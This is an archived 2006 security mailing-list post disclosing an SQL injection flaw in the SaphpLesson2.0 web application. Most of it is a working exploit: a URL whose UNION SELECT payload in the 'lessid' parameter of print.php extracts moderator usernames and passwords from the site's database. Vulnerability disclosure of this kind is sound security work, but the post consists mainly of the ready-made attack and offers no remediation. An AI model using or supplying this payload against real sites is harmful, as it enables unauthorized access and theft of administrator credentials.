|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
SQL Injection in SaphpLesson2.0
xx_hack_xx_2004
hotmail.com
Date: Sat Mar 25 2006 - 17:44:57 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi
Vulnerable: SaphpLesson2.0
http://www.Arabless.com
Exploit :
http://Example.com/lesson/print.php?lessid=[SQL]
Example :
For Name & Passowrd
http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor
Discovery by Linux_Drox
http://www.LeZr.Com
Best Regards ,,
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]